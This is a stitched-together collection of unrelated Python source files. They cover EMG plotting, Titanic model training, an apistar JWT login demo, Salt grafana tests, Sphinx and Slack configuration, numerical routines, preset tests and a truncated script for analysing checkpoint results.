# Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from matplotlib import pyplot as plt
from collections import deque
from threading import Lock, Thread
import myo
import numpy as np
class EmgCollector(myo.DeviceListener):
"""
Collects EMG data in a queue with *n* maximum number of elements.
"""
def __init__(self, n):
self.n = n
self.lock = Lock()
self.emg_data_queue = deque(maxlen=n)
def get_emg_data(self):
with self.lock:
return list(self.emg_data_queue)
# myo.DeviceListener
def on_connected(self, event):
event.device.stream_emg(True)
def on_emg(self, event):
with self.lock:
self.emg_data_queue.append((event.timestamp, event.emg))
class Plot(object):
def __init__(self, listener):
self.n = listener.n
self.listener = listener
self.fig = plt.figure()
self.axes = [self.fig.add_subplot('81' + str(i)) for i in range(1, 9)]
[(ax.set_ylim([-100, 100])) for ax in self.axes]
self.graphs = [ax.plot(np.arange(self.n), np.zeros(self.n))[0] for ax in self.axes]
plt.ion()
def update_plot(self):
emg_data = self.listener.get_emg_data()
emg_data = np.array([x[1] for x in emg_data]).T
for g, data in zip(self.graphs, emg_data):
if len(data) < self.n:
# Fill the left side with zeroes.
data = np.concatenate([np.zeros(self.n - len(data)), data])
g.set_ydata(data)
plt.draw()
def main(self):
while True:
self.update_plot()
plt.pause(1.0 / 30)
def main():
### enter the path to your own MyoSDK package and .dll file here. Download
# with Nuget @ https://www.nuget.org/packages/MyoSDK/2.1.0 and insert .dll file within
# /bin folder if required.
myo.init(sdk_path="C:\\Users\\dicke\\packages\\MyoSDK.2.1.0")
hub = myo.Hub()
listener = EmgCollector(512)
with hub.run_in_background(listener.on_event):
Plot(listener).main()
if __name__ == '__main__':
main()
| StarcoderdataPython |
3248884 | <gh_stars>0
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.tree import DecisionTreeClassifier as DTC
from sklearn.ensemble import ExtraTreesClassifier as ETC
from sklearn.ensemble import RandomForestClassifier as RDF
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import confusion_matrix, accuracy_score
# -
# ## Pre processing
# Based on EDA (see notebook:) data processing will be done below
# +
# import data
data_train = pd.read_csv('data/train.csv')
data_test = pd.read_csv('data/test.csv')
# Function to obtain information of null data (missing data)
def null_info(df):
num_null_val = df.isnull().sum()
p_null_val = 100*num_null_val/len(df)
null_info = pd.concat([num_null_val, p_null_val], axis=1)
null_info = null_info.rename(columns = {0: 'Counts of null', 1:'%'})
return null_info
data_train['Sex'] = data_train['Sex'].map({"male":0, "female":1})
data_test['Sex'] = data_test['Sex'].map({"male":0, "female":1})
data_train["Age"] = data_train["Age"].fillna(data_train["Age"].median())
data_test["Age"] = data_test["Age"].fillna(data_test["Age"].median())
data_train["Embarked"] = data_train["Embarked"].fillna("S")
data_test["Embarked"] = data_test["Embarked"].fillna("S")
# Repalce strings in "Embarked" to 0 (S), 1 (C), 2 (Q)
data_train["Embarked"] = data_train["Embarked"].map({"S":0, "C":1, "Q":2})
data_test["Embarked"] = data_test["Embarked"].map({"S":0, "C":1, "Q":2})
data_test["Fare"] = data_test["Fare"].fillna(data_test["Fare"].median())
# -
PassengerId_test = np.array(data_test['PassengerId']).astype(int)
# ## Models
colmuns_train = ['Pclass','Sex','Age','Parch']
df_test = data_test[colmuns_train]
# ### Data for cross-validation
# data_train.columns
X = data_train[colmun_train]
y = data_train[['Survived']]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=42)
# ### Linear Regression
X.columns
# #### Cross-validation
lm = LinearRegression()
lm.fit(X_train, y_train)
print(lm.intercept_)
lm.coef_
cdf = pd.DataFrame(lm.coef_,index=['Coeff'], columns=X.columns)
cdf
prediction = lm.predict(X_test)
res_predict = np.where(prediction>0.5, 1, 0)
accuracy_score(y_test, res_predict)
plt.scatter(y_test, prediction)
sns.distplot((y_test-prediction))
prediction_linR = lm.predict(df_test)
myPrediction_linR = pd.DataFrame(prediction_linR, PassengerId_test, columns=['Survived'])
myPrediction_linR['Survived'] = np.where(prediction_linR > 0.5, 1, 0)
myPrediction_linR.to_csv("results/Titianic_linR_model.csv", index_label = ["PassengerId"])b
myPrediction_linR
# ### Decision tree
clf_DTC = DTC(max_depth=4)
clf_DTC.fit(X_train,y_train)
y_pred_test = clf_DTC.predict(X_test)
accuracy_score(y_test, y_pred_test)
# ### Logistic Regression
logi_regg = LogisticRegression()
clf_LogiReg = logi_regg.fit(X_train,y_train)
clf_LogiReg.coef_
clf_LogiReg.intercept_
y_pred_LogiReg = clf_LogiReg.predict(X_test)
accuracy_score(y_test, y_pred_LogiReg)
| StarcoderdataPython |
3338805 | import datetime
from apistar import App, Route, exceptions, types, validators
from apistar_jwt.token import JWT, JWTUser
# Fake user database
USERS_DB = {'id': 1, 'email': '<EMAIL>', 'password': 'password'}
class UserData(types.Type):
email = validators.String()
password = validators.String()
def welcome(user: JWTUser) -> dict:
message = f'Welcome {user.username}#{user.id}, your login expires at {user.token["exp"]}'
return {'message': message}
def login(data: UserData, jwt: JWT) -> dict:
# do some check with your database here to see if the user is authenticated
if data.email != USERS_DB['email'] or data.password != USERS_DB['password']:
raise exceptions.Forbidden('Incorrect username or password.')
payload = {
'id': USERS_DB['id'],
'username': USERS_DB['email'],
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60) # ends in 60 minutes
}
token = jwt.encode(payload)
if token is None:
# encoding failed, handle error
raise exceptions.BadRequest()
return {'token': token}
routes = [
Route('/', method='GET', handler=welcome),
Route('/login', method='POST', handler=login),
]
components = [
JWT({
'JWT_SECRET': '<KEY>',
}),
]
app = App(routes=routes, components=components)
if __name__ == '__main__':
app.serve('127.0.0.1', 8080, use_debugger=True, use_reloader=True)
| StarcoderdataPython |
117571 | <reponame>spiralgenetics/biograph
# pylint: disable=missing-docstring
from __future__ import print_function
import unittest
import biograph
import biograph.variants as bgexvar
def vcf_assembly(pos, ref, alt, asm_id):
pos = int(pos)-1
if ref and alt and ref[0] == alt[0]:
ref = ref[1:]
alt = alt[1:]
pos = pos + 1
return bgexvar.Assembly(pos, pos + len(ref), alt, asm_id)
# Raises an error that F0705 21:53:28.427729 102440 read_cov.cpp:28] Check failed: !m_interior
asms = [vcf_assembly('17125234', 'A', 'G', 17125234),
vcf_assembly('17125346', 'T', 'C', 17125346),
vcf_assembly('17125438', 'A', 'C', 17125438),
vcf_assembly('17125626', 'A', 'C', 17125626)]
bg = biograph.BioGraph("/share/datasets/HG002/HG002-NA24385-50x.bg/", biograph.CacheStrategy.MMAP)
seqset = bg.seqset
rm = bg.open_readmap()
ref = biograph.Reference("/reference/hs37d5")
for pos,asm in enumerate(asms):
print(pos)
pc = list(bgexvar.generate_read_cov(rm, ref, "1", [asm]))
| StarcoderdataPython |
141728 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ProDy: A Python Package for Protein Dynamics Analysis
#
# Copyright (C) 2010-2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2010-2012 <NAME>'
from prody.tests import TestCase
from prody.utilities import rangeString
try:
range = xrange
except NameError:
pass
class TestRangeString(TestCase):
def testContinuous(self):
self.assertEqual(rangeString(list(range(10))), '0 to 9')
def testNegative(self):
self.assertEqual(rangeString(list(range(-5, 10)), pos=False),
'-5 to 9')
def testGapped(self):
self.assertEqual(rangeString(list(range(-5, 10)) +
list(range(15, 20)) +
list(range(25, 30)), pos=False),
'-5 to 9 15 to 19 25 to 29')
def testRepeated(self):
self.assertEqual(rangeString(list(range(10, 20)) +
list(range(15, 20)) +
list(range(30))), '0 to 29')
| StarcoderdataPython |
14788 | # -*- coding: utf-8 -*-
'''
:codeauthor: <NAME> <<EMAIL>>
'''
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import (
MagicMock,
patch
)
# Import Salt Libs
import salt.utils.json
import salt.states.grafana as grafana
from salt.exceptions import SaltInvocationError
class GrafanaTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.states.grafana
'''
def setup_loader_modules(self):
return {grafana: {}}
# 'dashboard_present' function tests: 1
def test_dashboard_present(self):
'''
Test to ensure the grafana dashboard exists and is managed.
'''
name = 'myservice'
rows = ['systemhealth', 'requests', 'title']
row = [{'panels': [{'id': 'a'}], 'title': 'systemhealth'}]
ret = {'name': name,
'result': None,
'changes': {},
'comment': ''}
comt1 = ('Dashboard myservice is set to be updated. The following rows '
'set to be updated: {0}'.format(['systemhealth']))
self.assertRaises(SaltInvocationError, grafana.dashboard_present, name,
profile=False)
self.assertRaises(SaltInvocationError, grafana.dashboard_present, name,
True, True)
mock = MagicMock(side_effect=[{'hosts': True, 'index': False},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True}])
mock_f = MagicMock(side_effect=[False, False, True, True, True, True])
mock_t = MagicMock(return_value='')
mock_i = MagicMock(return_value=False)
source = {'dashboard': '["rows", {"rows":["baz", null, 1.0, 2]}]'}
mock_dict = MagicMock(return_value={'_source': source})
with patch.dict(grafana.__salt__, {'config.option': mock,
'elasticsearch.exists': mock_f,
'pillar.get': mock_t,
'elasticsearch.get': mock_dict,
'elasticsearch.index': mock_i}):
self.assertRaises(SaltInvocationError, grafana.dashboard_present,
name)
with patch.dict(grafana.__opts__, {'test': True}):
self.assertRaises(SaltInvocationError, grafana.dashboard_present,
name)
comt = ('Dashboard {0} is set to be created.'.format(name))
ret.update({'comment': comt})
self.assertDictEqual(grafana.dashboard_present(name, True), ret)
mock = MagicMock(return_value={'rows':
[{'panels': 'b',
'title': 'systemhealth'}]})
with patch.object(salt.utils.json, 'loads', mock):
ret.update({'comment': comt1, 'result': None})
self.assertDictEqual(grafana.dashboard_present(name, True,
rows=row),
ret)
with patch.object(salt.utils.json, 'loads',
MagicMock(return_value={'rows': {}})):
self.assertRaises(SaltInvocationError,
grafana.dashboard_present, name,
rows_from_pillar=rows)
comt = ('Dashboard myservice is up to date')
ret.update({'comment': comt, 'result': True})
self.assertDictEqual(grafana.dashboard_present(name, True), ret)
mock = MagicMock(return_value={'rows': [{'panels': 'b',
'title': 'systemhealth'}]})
with patch.dict(grafana.__opts__, {'test': False}):
with patch.object(salt.utils.json, 'loads', mock):
comt = ('Failed to update dashboard myservice.')
ret.update({'comment': comt, 'result': False})
self.assertDictEqual(grafana.dashboard_present(name, True,
rows=row),
ret)
# 'dashboard_absent' function tests: 1
def test_dashboard_absent(self):
'''
Test to ensure the named grafana dashboard is deleted.
'''
name = 'myservice'
ret = {'name': name,
'result': None,
'changes': {},
'comment': ''}
mock = MagicMock(side_effect=[{'hosts': True, 'index': False},
{'hosts': True, 'index': True},
{'hosts': True, 'index': True}])
mock_f = MagicMock(side_effect=[True, False])
with patch.dict(grafana.__salt__, {'config.option': mock,
'elasticsearch.exists': mock_f}):
self.assertRaises(SaltInvocationError, grafana.dashboard_absent,
name)
with patch.dict(grafana.__opts__, {'test': True}):
comt = ('Dashboard myservice is set to be removed.')
ret.update({'comment': comt, 'result': None})
self.assertDictEqual(grafana.dashboard_absent(name), ret)
comt = ('Dashboard myservice does not exist.')
ret.update({'comment': comt, 'result': True})
self.assertDictEqual(grafana.dashboard_absent(name), ret)
| StarcoderdataPython |
3320835 | <filename>docs/source/conf.py
# -*- coding: utf-8 -*-
import sys
import os
sys.path.insert(0, os.path.abspath('../../'))
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
]
templates_path = ['_templates']
source_suffix = '.rst'
source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'message-queue'
copyright = u'2016, Ingresse'
author = u'Ingresse'
version = u'0.1.1'
release = u'0.1.1'
language = None
exclude_patterns = []
pygments_style = 'sphinx'
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
htmlhelp_basename = 'message-queuedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {}
latex_documents = [
(master_doc, 'message-queue.tex', u'message-queue Documentation',
u'Ingresse', 'manual'),
]
# -- Options for manual page output ---------------------------------------
man_pages = [
(master_doc, 'message-queue', u'message-queue Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
texinfo_documents = [
(master_doc, 'message-queue', u'message-queue Documentation',
author, 'message-queue', 'Message Queue',
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
| StarcoderdataPython |
1631373 | <filename>app/database.py
import logging
import os
from typing import Optional
import sqlalchemy
from slack_sdk.oauth.installation_store import InstallationStore
from slack_sdk.oauth.installation_store.sqlalchemy import SQLAlchemyInstallationStore
from slack_sdk.oauth.state_store.sqlalchemy import SQLAlchemyOAuthStateStore
from sqlalchemy.engine import Engine
logger = logging.getLogger(__name__)
user_token = os.environ.get("SLACK_USER_TOKEN")
engine: Optional[Engine] = None
installation_store: Optional[InstallationStore] = None
client_id = os.environ["SLACK_CLIENT_ID"]
local_database_url = "sqlite:///local_dev.db"
database_url = os.environ.get("DATABASE_URL") or local_database_url
logger.info(f"database: {database_url}")
logging.getLogger("sqlalchemy.engine").setLevel(logging.DEBUG)
engine = sqlalchemy.create_engine(database_url)
installation_store = SQLAlchemyInstallationStore(
client_id=client_id,
engine=engine,
logger=logger,
)
oauth_state_store = SQLAlchemyOAuthStateStore(
expiration_seconds=120,
engine=engine,
logger=logger,
)
def run_db_migration():
try:
engine.execute("select count(*) from slack_bots")
except Exception as _:
installation_store.metadata.create_all(engine)
oauth_state_store.metadata.create_all(engine)
if database_url == local_database_url:
run_db_migration()
| StarcoderdataPython |
3337933 | <reponame>adarshd8127/Hacktoberfest-3
import scipy.integrate as spi
def arc_length(f,a,b,h=0.001,N=1000):
'''Approximate the arc length of y=f(x) from x=a to x=b.
Parameters
----------
f : (vectorized) function of one variable
a,b : numbers defining the interval [a,b]
h : step size to use in difference formulas
N : number of subintervals in trapezoid method
Returns
-------
Approximation of the integral \int_a^b \sqrt{1 + (f'(x))^2} dx
representing the arc length of y=f(x) from x=a to x=b.
'''
x = np.linspace(a,b,N+1)
y = f(x)
# Compute central difference formula for x_k for 1 <= k <= N-1
h = np.min([h,(b-a)/N]) # Make sure that h is smaller than the size of the subintervals
x_interior = x[1:-1]
df_interior = (f(x_interior + h) - f(x_interior - h))/(2*h)
# Use forward/backward difference formula at the endpoints
df_a = (f(a + h) - f(a))/h
df_b = (f(b) - f(b - h))/h
df = np.hstack([[df_a],df_interior,[df_b]])
# Compute values of the integrand in arc length formula
y = np.sqrt(1 + df**2)
# Compute the integral
L = spi.trapz(y,x)
return L
print(arc_length(lambda x: x,0,1)) | StarcoderdataPython |
27 | ##########################################################################
#
# Copyright (c) 2010-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import os
import sys
import shutil
import unittest
import IECore
class TestBasicPreset( unittest.TestCase ) :
def testCopy( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
p = IECore.BasicPreset( testObj, testObj.parameters() )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
p2 = IECore.BasicPreset( testObj, testObj.parameters(), parameters=( testObj.parameters()["a"], ) )
self.assertTrue( p2.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p2.applicableTo( testObj2, testObj.parameters() ) )
p2( testObj2, testObj2.parameters() )
self.assertEqual( testObj2.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj2.parameters()["c"].getTypedValue(), 0.0 )
def testLoad( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised1" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
messageHandler = IECore.CapturingMessageHandler()
with messageHandler :
p = IECore.BasicPreset( os.path.join( savePath, "basicPresetLoadTest", "basicPresetLoadTest-1.cob" ) )
self.assertEqual( len( messageHandler.messages ), 0 )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
def testSave( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised1" )
testObj2.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.FloatParameter( "c", "", 0.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
preset = IECore.BasicPreset( testObj, testObj.parameters() )
# Save for the classLoader and check its there, we test the 'loadability' later...
preset.save( savePath, "basicPresetTest" )
self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest", "basicPresetTest-1.cob" ) ) )
self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest", "basicPresetTest-1.py" ) ) )
# save without the classLoader and check its there
preset.save( savePath, "basicPresetTest", classLoadable=False )
self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest.cob" ) ) )
# reload
p = IECore.BasicPreset( os.path.join( savePath, "basicPresetTest.cob" ) )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
preset2 = IECore.BasicPreset( testObj, testObj.parameters(), parameters=( testObj.parameters()["a"], ) )
preset2.save( savePath, "basicPresetTest2", classLoadable=False )
#reload
p2 = IECore.BasicPreset( os.path.join( savePath, "basicPresetTest2.cob" ) )
self.assertTrue( p2.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p2.applicableTo( testObj2, testObj.parameters() ) )
p2( testObj2, testObj2.parameters() )
self.assertEqual( testObj2.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj2.parameters()["c"].getTypedValue(), 0.0 )
def testClassLoader( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
preset = IECore.BasicPreset( testObj, testObj.parameters() )
preset.save( savePath, "basicPresetTestClassLoader" )
# make sure that no messages are emitted during loading
messageHandler = IECore.CapturingMessageHandler()
with messageHandler :
loader = IECore.ClassLoader( IECore.SearchPath( savePath ) )
p = loader.load( "basicPresetTestClassLoader" )()
self.assertEqual( len( messageHandler.messages ), 0 )
self.assertTrue( isinstance( p, IECore.BasicPreset ) )
p.metadata()
def testClasses( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.ClassParameter( "b", "", "IECORE_OP_PATHS", os.path.join( "maths", "multiply" ), 2 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.ClassParameter( "c", "", "IECORE_OP_PATHS" ),
]
)
classes1 = testObj.parameters()["b"].getClass( True )
classes2 = testObj2.parameters()["c"].getClass( True )
self.assertNotEqual( classes1[1:], classes2[1:] )
p = IECore.BasicPreset( testObj, testObj.parameters()["b"] )
self.assertTrue( p.applicableTo( testObj, testObj.parameters()["b"] ) )
self.assertFalse( p.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p.applicableTo( testObj2, testObj2.parameters()["c"] ) )
p( testObj2, testObj2.parameters()["c"] )
classes1 = testObj.parameters()["b"].getClass( True )
classes2 = testObj2.parameters()["c"].getClass( True )
self.assertEqual( classes1[1:], classes2[1:] )
def testClassVectors( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.ClassVectorParameter( "b", "", "IECORE_OP_PATHS" ),
]
)
testObj.parameters()["b"].setClasses(
[
( "mult", os.path.join( "maths", "multiply" ), 2 ),
( "coIO", "compoundObjectInOut", 1 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.ClassVectorParameter( "c", "", "IECORE_OP_PATHS" ),
]
)
classes1 = [ c[1:] for c in testObj.parameters()["b"].getClasses( True ) ]
classes2 = [ c[1:] for c in testObj2.parameters()["c"].getClasses( True ) ]
self.assertNotEqual( classes1, classes2 )
p = IECore.BasicPreset( testObj, testObj.parameters()["b"] )
self.assertTrue( p.applicableTo( testObj, testObj.parameters()["b"] ) )
self.assertFalse( p.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p.applicableTo( testObj2, testObj2.parameters()["c"] ) )
p( testObj2, testObj2.parameters()["c"] )
classes1 = [ c[1:] for c in testObj.parameters()["b"].getClasses( True ) ]
classes2 = [ c[1:] for c in testObj2.parameters()["c"].getClasses( True ) ]
self.assertEqual( classes1, classes2 )
def testCompoundVectorParameter( self ) :
p = IECore.Parameterised( "test" )
p.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.CompoundVectorParameter(
"c",
"",
members = [
IECore.StringVectorParameter( "s", "", IECore.StringVectorData() ),
IECore.BoolVectorParameter( "b", "", IECore.BoolVectorData() ),
]
)
]
)
p["c"]["s"].setValue( IECore.StringVectorData( [ "1", "2", "3" ] ) )
p["c"]["b"].setValue( IECore.BoolVectorData( [ True, False, True ] ) )
v = p.parameters().getValue().copy()
preset = IECore.BasicPreset( p, p.parameters() )
self.assertTrue( preset.applicableTo( p, p.parameters() ) )
p.parameters().setValue( p.parameters().defaultValue )
self.assertNotEqual( p.parameters().getValue(), v )
preset( p, p.parameters() )
self.assertEqual( p.parameters().getValue(), v )
def tearDown( self ) :
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
paths = (
os.path.join( savePath, "basicPresetTest" ),
os.path.join( savePath, "basicPresetTest.cob" ),
os.path.join( savePath, "basicPresetTest2.cob" ),
os.path.join( savePath, "basicPresetTestClassLoader" ),
)
for p in paths :
if os.path.isdir( p ) :
shutil.rmtree( p )
elif os.path.isfile( p ) :
os.remove( p )
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
111987 | import numpy as np
from numba import njit, prange
# consav
from consav import linear_interp # for linear interpolation
from consav import golden_section_search # for optimization in 1D
# local modules
import utility
# a. define objective function
@njit
def obj_bellman(c,m,interp_w,par):
""" evaluate bellman equation """
# a. end-of-period assets
a = m-c
# b. continuation value
w = linear_interp.interp_1d(par.grid_a,interp_w,a)
# c. total value
value_of_choice = utility.func(c,par) + w
return -value_of_choice # we are minimizing
# b. solve bellman equation
@njit(parallel=True)
def solve_bellman(t,sol,par):
"""solve bellman equation using nvfi"""
# unpack (this helps numba optimize)
v = sol.v[t]
c = sol.c[t]
# loop over outer states
for ip in prange(par.Np): # in parallel
# loop over cash-on-hand
for im in range(par.Nm):
# a. cash-on-hand
m = par.grid_m[im]
# b. optimal choice
c_low = np.fmin(m/2,1e-8)
c_high = m
c[ip,im] = golden_section_search.optimizer(obj_bellman,c_low,c_high,args=(m,sol.w[ip],par),tol=par.tol)
# note: the above finds the minimum of obj_bellman in range [c_low,c_high] with a tolerance of par.tol
# and arguments (except for c) as specified
# c. optimal value
v[ip,im] = -obj_bellman(c[ip,im],m,sol.w[ip],par)
| StarcoderdataPython |
170126 | <gh_stars>1-10
"""
Plot accuracy:
python analyze_result.py $path_to_MMI $path_to_peek $path_to_random -l MMI peek random
Plot gain over random:
python analyze_result.py $path_to_MMI $path_to_peek $path_to_random -l MMI peek random --gain-over-random
"""
import argparse
import glob
import numpy as np
import os
import pylab
import subprocess
pylab.rcParams['font.size']=20
colors=['r', 'g', 'b', 'c', 'm', 'y', 'k']
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('log_dirs', nargs='+', help='one or multiple dirs, '
'each contains logs that corresponds to a '
'ckpt selection method')
parser.add_argument('-l', '--label', nargs='+',
help='label for each dir')
parser.add_argument('--gain-over-random', action='store_true',
help='plot the gain of each non-random method '
'against random')
parser.add_argument('-s', help='path to save the figure. If not given, '
'will show the figure')
return parser.parse_args()
def grep_result(log_dir):
"""
Return a numpy array of validation accuracies for all log files under
the dir. The logs are due to a certain selection methods of checkpoints.
They are named as selection_k${k_ckpts}_t${task_id}
Suppose there are T tasks, and we select up to K checkpoints.
If random selection with R different random seeds, the returned is
R x T x K array
If other (determnistic) method, the returned is
T x K array
"""
fs = glob.glob(os.path.join(log_dir, '*_k[1-9]*_t[0-9]*.out'))
fs = [f.split('/')[-1] for f in fs]
K = max([int(f.split('.')[0].split('_')[1][1:]) for f in fs])
T = max([int(f.split('.')[0].split('_')[2][1:]) for f in fs]) + 1
is_random_selection = 'seed' in fs[0]
if is_random_selection:
seeds = [int(f.split('_')[0][4:]) for f in fs]
seeds = np.unique(seeds)
R = len(seeds)
Results = np.zeros((R, T, K))
for i, s in enumerate(seeds):
for t in range(T):
for k in range(1, K+1):
fname = os.path.join(log_dir,
'seed{}_k{}_t{}.out'.format(s, k, t))
acc = float(
subprocess.check_output(
['./get_acc.sh', fname]).decode('utf-8')\
.strip()) * 100
Results[i, t, k-1] = acc
else:
method=fs[0].split('_')[0]
